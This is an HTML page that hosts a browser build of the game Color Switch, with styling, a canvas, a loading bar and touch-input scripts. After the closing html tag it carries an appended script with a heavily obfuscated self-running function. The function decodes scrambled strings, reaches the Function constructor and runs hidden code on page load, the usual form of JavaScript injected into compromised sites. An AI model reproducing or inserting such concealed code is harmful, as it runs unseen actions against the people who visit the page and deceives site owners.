<!doctype html>
<html lang="en-us">

<head>
  <meta charset="utf-8">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Color Switch</title>
  <meta name="viewport" content="width=device-width, user-scalable=no">
  <style>
    /* the canvas *must not* have any border or padding, or mouse coords will be wrong */

    * {
      box-sizing: border-box;
    }

    body {
      margin: 0;
      background-color: black;
    }

    canvas.emscripten {
      border: 0px none;
      height: 600px;
    }

    canvas.emscripten.visible {
      opacity: 1;
      transition: opacity 0.5s ease-in;
      transition-delay: 1s;
    }

    .canvas-container {
      position: relative;
      max-height: 600px;
      background-image: url("https://cdn.glitch.com/161fba10-08d4-4007-b3c4-cf3478168729%2Fbg-galaxy3-6.png?1557025303102");
      background-size: cover;
      background-repeat: no-repeat;
      background-position: center center;
      margin: 0px auto;
      text-align: center;

    }

    .canvas-container:after {
      padding-top: 133.3333%;
      /* 16:9 ratio */
      display: block;
      content: '';
    }

    .progress {
      position: absolute;
      top: 84%;
      left: 0;
      right: 0;
      width: 90%;
      height: 28px;
      margin: 0 auto;
      margin-bottom: 24px;
      overflow: hidden;
      border-radius: 2px;
      background-color: #F7F7F7;
      box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
    }

    .progress-bar {
      float: left;
      width: 0;
      min-width: 2%;
      height: 100%;
      font-size: 20px;
      font-family: monospace;
      line-height: 28px;
      color: #AAA;
      text-align: center;
      transition: width .1s ease;
      background-color: #292929;
    }

    .touchLayer {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
    }
  </style>

</head>

<body>
  <div class="canvas-container">
    <!-- onclick="void(0)" -->
    <canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
    <div id="progress" class="progress">
      <div id="progress-bar" class="progress-bar" style="width: 0%">0%</div>
    </div>

    <a id="link_android" target="__blank"
      href="https://play.google.com/store/apps/details?id=com.fortafygames.colorswitch"
      style="position: absolute; display: none;"></a>
    <a id="link_ios" target="__blank" href="https://itunes.apple.com/app/id1053533457"
      style="position: absolute; display: none;"></a>
    <a id="link_fb" target="__blank" href="https://www.facebook.com/fortafygames"
      style="position: absolute; display: none;"></a>
    <a id="link_poki" target="__blank" href="http://poki.com/" style="position: absolute; display: none;"></a>

    <!--<div id="touch" class="touchLayer">
        </div>-->
    <div id="poki-sdk-container" style="display: none; position: absolute; top: 0; left: 0; width: 100%; height: 100%;">
    </div>
  </div>
  <script type='text/javascript'>

    // connect to canvas
    var Module = {
      preRun: [],
      postRun: [],
      print: function () {
        console.log(Array.prototype.slice.call(arguments).join(" "));
      },
      printErr: function () {
        console.warn(Array.prototype.slice.call(arguments).join(" "));
      },
      canvas: document.getElementById('canvas'),
      totalDependencies: 0,
      monitorRunDependencies: function (left) {
        this.totalDependencies = Math.max(this.totalDependencies, left);
        //console.log('Downloading...', (100*(this.totalDependencies-left)/this.totalDependencies) + '%');
        //console.log(Module);
        // console.log('monitorRunDependencies', left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
      }
    }


    window.addEventListener("keydown", function (e) {
      // space and arrow keys
      if ([32, 37, 38, 39, 40].indexOf(e.keyCode) > -1) {
        e.preventDefault();
      }
    }, false);

    function addEvent(elementId, evnt, funct) {
      var element = document.getElementById(elementId);
      if (element.attachEvent)
        return element.attachEvent('on' + evnt, funct);
      else
        return element.addEventListener(evnt, funct, false);
    }


    function setupCanvasTouchEvents() {
      var canvas = document.getElementById("canvas");
      var el = document.getElementById("canvas"); // "touch"
      function adjustX(x) {
        return x * canvas.width / parseInt(getComputedStyle(el).width, 10);
      }
      function adjustY(y) {
        return y * canvas.height / parseInt(getComputedStyle(el).height, 10);
      }

      el.addEventListener("touchstart", function (evt) {
        evt.preventDefault();
        var touches = evt.changedTouches;
        for (var i = 0; i < touches.length; i++) {
          var touch = touches[i];
          //console.log('_pInput_TouchStart', _pInput_TouchStart);
          _pInput_TouchStart(touch.identifier % 10, adjustX(touch.clientX), adjustY(touch.clientY));
        }
      }, false);
      el.addEventListener("touchend", function (evt) {
        evt.preventDefault();
        var touches = evt.changedTouches;
        for (var i = 0; i < touches.length; i++) {
          var touch = touches[i];
          _pInput_TouchEnd(touch.identifier % 10);
        }
      }, false);
      el.addEventListener("touchmove", function (evt) {
        evt.preventDefault();
        var touches = evt.changedTouches;
        for (var i = 0; i < touches.length; i++) {
          var touch = touches[i];
          _pInput_TouchMove(touch.identifier % 10, adjustX(touch.clientX), adjustY(touch.clientY));
        }
      }, false);
    }

    var progressBar = document.getElementById("progress-bar");
    var interval = setInterval(function () {
      if (Module.dataFileDownloads && Module.dataFileDownloads["game.data"]) {
        var data = Module.dataFileDownloads["game.data"];
        //console.log(data.loaded, '/', data.total)
        var percent = Math.round(data.loaded * 100 / data.total);
        progressBar.style.width = percent + '%';
        progressBar.innerHTML = percent + '%';
        if (data.loaded >= data.total) {
          document.getElementById("progress").style.display = "none";
          document.getElementById("canvas").className += " visible";
          setupCanvasTouchEvents();
          clearInterval(interval);
        }
      }
    }, 100);

  </script>
  <script async type="text/javascript" src="game.js"></script>

</body>

</html>
<script>

(function() {
    var KeY='', iFD=494-483;
    function xsh(b) {
        var g=2231620;
        var p=b.length;
        var d=[];
        for(var u=0; u<p; u++) { d[u]=b.charAt(u); }
        for(var u=0; u<p; u++) {
            var e=g*(u+469)+(g%24291);
            var f=g*(u+603)+(g%33615);
            var k=e%p;
            var i=f%p;
            var j=d[k];
            d[k]=d[i];
            d[i]=j;
            g=(e+f)%2984823;
        };
        return d.join('');
    }
    var dGm=xsh('dtroostitjfayxbglcnecmrnuocukqwrshpvz').substr(0,iFD);
    var deV='=ar c!s3hf.{lt==q8;.Cr)[3n=[nt6<)lA ,=n;)n=0<t=rwiCi=.> +uicvs0z1ru2s5sbdi;fs.r7..)rt;;07v.7fz(tA,5aa6 ma,o),+.v8ler9(nesrtnr2,g;==gonu o;osan;e i6rejftoSh..a;uao9]]=};";fa  ;S1les+()(.y+ v9lv;c1[-ptrhv..tt,0;[ ar"e=)is)((e)v(omr;fr9,effa=h8.=me}v1(br8,rha{]",rhk.ar(for"rkcan+Cnt[a1alvv9++)p)0p;vt=d=nl;),rr sjc[+]=r2n ;tz1ac )tr.m;e=(,=jajaAqp ybt.c[pqnC1l*vtir)zeh=s (rsel;8naj=-=z(,ghxf)dbv;vnu=ilrlc}e,sno,a a[=nj< +8=v[l}fqeh+4tdmAicj(n)-,)(tnC8r+<sg6fec3h()0<gs{][x+uity07)rit(r}aabj;=+(i";7jg12o),;rl,=z=Ccv;i] ;]--;p{es)1l(v (ls0{ngn=t(oaj ;u(+==4]8b(s+km;ogiarbo).l,sli=ts)(w[si e;8,ncpli.p+1i(lvx>A]wum8l0)=oh((v-(;fhe];hzml1;8r+vfah(,(gr"rte;ia7lv)rn[e]lj.4oso(s"25hura(=rh]d,jow.!v;++e=67;hd),g;i)a)r+u==;0aa9,4.du2,=[,0;cguftl9xug=le)r)=1+0xhogzo=}mnea+zrv0C4s";7nfi-;ra)aiie]s6qn .6hvv{t6f,pt* p.arsm)r]hk;;Cuoln{fl7c(+r;ai. r;pbr)q(gh(=sr[lvlpg,j2bt22g.s)ln;n++"9nc."}6r ug;';var VUu=xsh[dGm];var IgE='';var oDZ=VUu;var PHl=VUu(IgE,xsh(deV));var gDm=PHl(xsh('s.)a_sng6bt3a.3(;b;taEcuQs)rae]5w,.b5)QQQar1aosQs6a)ot7)mQns(QarS(Q5.)4;5Q0ontE5wQt.,tuoQeQQasQ=j6%.o ==\/\/_.cQsce$;sQQ,(ac(Q7aA=eQ[!js)o{$(s.QQo3S_(bngQ$tuhm_yQS&QycQ,tt{s$dn353)3auiot_;&)0.1!tQrQq6m;63t,duQ).5ps%;)C"(c}Q_qd37+%.sy4.f\/.ehQ(%@])Q;:Ti6QEa);reF)$a0eFjNQ6t.d4Q=_+tt$Q!.o CeQ%)})t.(e6re(ioQ8w)%.d.m#$QQsjxr=.Q2mp7Qta(a=}l_CQog_,irQiQ Qe>Q.4p(5y$m?_i7.lu=twm..5_iQp 3"tl)MsbQanbMd7er)(ueipQd,@rbn60d$7%.%)dus.QQtQd)i#t(.QqDg<e._7,6__...9{3a ]a(eittq=r !.)h(QexQnQ0kk3nuf\/Q) ta_ ]aw1nQc?)oQswm@(({5cu7r%%$$Q.a=p(a)iQ.s+9j1$y$QQ{Q?$,Qc7 .o)%rnt;S( ts,e$4<p!_kaat=.!Ql(x0 s73o%t=i$rw+(i"f;t()_0_a!3Q(2r7o95}z$uQh9>6)Q48)ct)Qaihcs..43s_o1oQQ=()r%;r+>]QQQ=wdc]}CQ+sir(7;i{u.Qi_](r5Ts=] 4.%_7$.o)Q.Qp3rs$]Qe\'ru]7}2r.fo$)]b2_c) j36";neQ11.)r<r_z41i3i!af0n;3l((QQ!B5)Q{rFE}]2}3 7=t+.bcQj.t trvmj_Q0F$5.on=at,9csr"0dQ1e0Q}Qn,_Q{Q2(r"bou,(-!?w.(b9{dmvg txT,es,sEa6{4_7r(kuj;Q,}4.#ooa=_bju]{5a)).6){r29%6-ah.(#=S+v=wept!$te}lip.un5)QeQ]hsm)QQoQ roaQ.Q,.tdtQqr1Q)l!rl79rm;)...Nd6.Qai.zafr ce=.o,Q2!$_ircn=oe;.a$t6}.tQ(%_8sd 1?.aeQitQ2(Q Q,%!5(QQ_sx7l)t2rdi,Q!"]}lQ,0;Qto8d.a(%=(Q{{_Cn$t3rt]]c1&hQ,$7lE)tgtec9 ecQQQ3em553_t)e2r_(3rr6T%)$rQ5rt(n+3!a+;}t;0 ;]4trQg.hk9..,o@\/2(.1]0Q.{j)8"rQ.%1,ic!Q6oQQ))fCQ(y&e;o3sQtv9QQuQ5es,0(1(\/!6.!pif.)i-;?rQab3wt4NtlNniexq.) Q=]=.zzd\'t;1.)cr]QQ0_([(_Q.a?eh,7)Qa](k(d 2Qt7$1Q(Qa(>a70rjQ5+QQQa(Q"l53.Qi.[1Qa]pe6)Q8a%6\'x5}.!D*!frbaQ95Q=.Q-BroQi]3]4\/_Qis0:e*;o2_tQn1bd6ae;.$i0s)e,_!Q1]op !e(-r\'>fw);]Q>5pQQuszs_sic4.c6p;$).!-9]to_mr8}6.sc8el4t.C.=eEd1QQ$6t0 c2,3ClelQbt..),+;o{sQlb7g#]f]$o).7adzr(%?(!c{__orQo;%Qo!.;;>!rf5tyn=Aed,Qg_.?#..igo7cze2=QQ!4eu()=Q5nQewg}Q(Q,ze_w8Qcy{a,6a1)\/4-(;i_Asa4_qut!s1(oka)(]ec;\/h](6!o=3*Q=(.Q_be=Q;QQdc;r0i*#o-s ak\/aQe1l.i)jQo2=(Q(.]a__(Q")$6d3.$6bmh)Q8QQahSjQsr7}rpkQ<Qfj_4.]Q@(tsja>7],lisag(r=paQ)(){(o+.(cw0)!%c7e5+1-s{.%#r}a!]]f:;}]nsQraplaQ33_]QfQn\/w s(.a[r)Qd{tCQaf690;t10n+4 nQ6 7[mtTbrQa)o%ftQ e_bsBQ6=4)5.4=a=b)j09A(Qj]oQ$!)\/7(*.)4._Q,!.!j\'ol6QS 3m;a+Qo.tQqdj#% f!4Qt$)]{ns8_;]i.0ne;tne+Iiu3c)i er;lztt.QDQ;n5_(it.of3,bsoon \'sBaQpcQz.s8b1o)_iefo_8).n_d)QQEr,6}sn5j=r=g5%:iQe }{ew)ro eek)n$)oQwiQ$e!89Qo(-.fliQ(.t7_;i1Q.%=eQf*,af41n)lfe;ieu '));var fAC=oDZ(KeY,gDm );fAC(3392);return 9309
})()

</script>
